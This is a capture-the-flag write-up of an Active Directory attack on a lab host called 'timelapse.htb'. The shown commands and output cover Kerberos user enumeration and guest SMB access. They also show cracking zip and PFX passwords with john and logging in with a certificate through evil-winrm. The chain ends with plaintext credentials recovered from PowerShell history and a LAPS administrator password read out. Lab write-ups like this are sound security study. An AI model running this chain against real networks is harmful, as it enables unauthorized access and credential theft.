Foreword
There is no Chinese input method in kali, please forgive my English level
Enumeration
nmap
┌──(root💀kali)-[~]
└─# nmap -sC -sV -T4 10.10.11.152 1 ⚙
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-08 16:17 CST
Nmap scan report for 10.10.11.152
Host is up (0.58s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-08 16:19:48Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 8h01m34s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-04-08T16:20:31
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.90 secondsAdd domain timelapse.htb to etc/hosts
Out-of-domain username enumeration
┌──(root💀kali)-[/opt/tools/domain_tools]
└─# ./kerbrute userenum -d timelapse.htb /usr/share/seclists/Usernames/top-usernames-shortlist.txt --dc 10.10.11.152 1 ⚙
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 04/08/22 - Ronnie Flathers @ropnop
2022/04/08 16:50:09 > Using KDC(s):
2022/04/08 16:50:09 > 10.10.11.152:88
2022/04/08 16:50:10 > [+] VALID USERNAME: guest@timelapse.htb
2022/04/08 16:50:10 > [+] VALID USERNAME: administrator@timelapse.htb
2022/04/08 16:50:11 > Done! Tested 17 usernames (2 valid) in 1.377 secondssmbmap
┌──(kali㉿kali)-[~]
└─$ smbmap -H 10.10.11.152 -u guest
[+] IP: 10.10.11.152:445 Name: timelapse.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
Shares READ ONLY
SYSVOL NO ACCESS Logon server shareusing the smbmap can found Shares have read privilege
try to login with guest by smbclient, there have a backup zip file
┌──(root💀kali)-[/opt/tools/domain_tools]
└─# smbclient -U guest -W timelapse.htb //timelapse.htb/Shares 130 ⨯ 1 ⚙
Enter TIMELAPSE.HTB\guest's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Oct 25 23:39:15 2021
.. D 0 Mon Oct 25 23:39:15 2021
Dev D 0 Tue Oct 26 03:40:06 2021
HelpDesk D 0 Mon Oct 25 23:48:42 2021
6367231 blocks of size 4096. 1382234 blocks available
smb: \> cd dev
smb: \dev\> ls
. D 0 Tue Oct 26 03:40:06 2021
.. D 0 Tue Oct 26 03:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 23:46:42 2021
6367231 blocks of size 4096. 1382218 blocks availableget it!
Brute password
unzip the backup file need password
so, I should find the password at first
┌──(kali㉿kali)-[~]
└─$ zip2john winrm_backup.zip > hash.txt
┌──(kali㉿kali)-[~]
└─$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2022-04-08 17:54) 3.846g/s 13359Kp/s 13359Kc/s 13359KC/s surki..superkeep16
Use the "--show" option to display all of the cracked passwords reliably
Session completedget password supremelegacy
unzip the to get legacyy_dev_auth.pfx file. This file also should password to open, using john too
python pfx2john.py ~/legacyy_dev_auth.pfx > ~/pfx_hash.txt
john pfx_hash.txt --format=pfx --wordlist=/usr/share/wordlists/rockyou.txtget password: thuglegacy
unlock the pfx file, I found a file named Legacyy in it, and the name is a vaild username in kerberos
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 04/08/22 - Ronnie Flathers @ropnop
2022/04/08 18:49:18 > Using KDC(s):
2022/04/08 18:49:18 > 10.10.11.152:88
2022/04/08 18:49:18 > [+] VALID USERNAME: Legacyy@timelapse.htb
2022/04/08 18:49:18 > Done! Tested 1 usernames (1 valid) in 0.320 secondsUser flag
I try to brute legacyy’s password by kerbrute, but fail
so, let back to where we started. We found a backup file, which name is winrm_backup.zip. Unzip the compressed file, We get the legacyy_dev_auth.pfx
Maybe the winrm is a component or service in windows. I try to search it in google and I get the explain by Microsoft.
Windows Remote Management (WinRM) is the Microsoft implementation of WS-Management Protocol, a standard Simple Object Access Protocol (SOAP)-based, firewall-friendly protocol that allows hardware and operating systems, from different vendors, to interoperate.
I consider the winrm is similar to SSH. So the credentials are also required.
As we all know, the pfx file usually contains the X.509 certificate and private key, and the legacyy_dev_auth.pfx we haven’t use yet. So I think the pfx can be used for authentication in winrm. Let’s separate the private key and X.509 certficate from the pfx file.
openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out Legacyy.pem
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out cert.key -nodesNow, the problem is how to connect windows by winrm in linux (kali). I found a tool named evil-winrm in github, which can connect to remote computer by winrm and use certificates for Authentication. Installation is simple in kali: sudo apt-get install evil-winrm
Let’s connect!
┌──(kali㉿kali)-[~]
└─$ evil-winrm -i 10.10.11.152 -S -c Legacyy.pem -k cert.key
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyyget user flag in c:\users\legacyy\desktop\user.txt
Root flag
After a long and futile enumeration, Prompted by pyp in forum and this blog, I found the powershell history file
*Evil-WinRM* PS C:\users\legacyy\appdata\Roaming\Microsoft\Windows\PowerShell\PSReadLine> type ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exitWOW, there have svc_deploy’s credentials. following the history commands, we can execute commands as svc_deploy user
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
TIMELAPSE\LAPS_Readers Group S-1-5-21-671920749-559770252-3318990721-2601 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448The svc_deploy user is a member of theLAPS_Readers group. After some googling, I found that LAPS_Readers group members can read the password of the administrator user
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {Get-ADComputer -Identity dc01 -properties * | findstr ms-Mcs-AdmPwd}I got the password of administrator!
ms-Mcs-AdmPwd : )Vls1+OD0%8WlDdJ6Q)G!4)-
ms-Mcs-AdmPwdExpirationTime : 132943373149524209Now, login as administrator!
┌──(kali㉿kali)-[~]
└─$ evil-winrm -i 10.10.11.152 -S -u administrator -p ')Vls1+OD0%8WlDdJ6Q)G!4)-' 130 ⨯
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
timelapse\administratorGet root.txt in c:\users\TRX\desktop\root.txt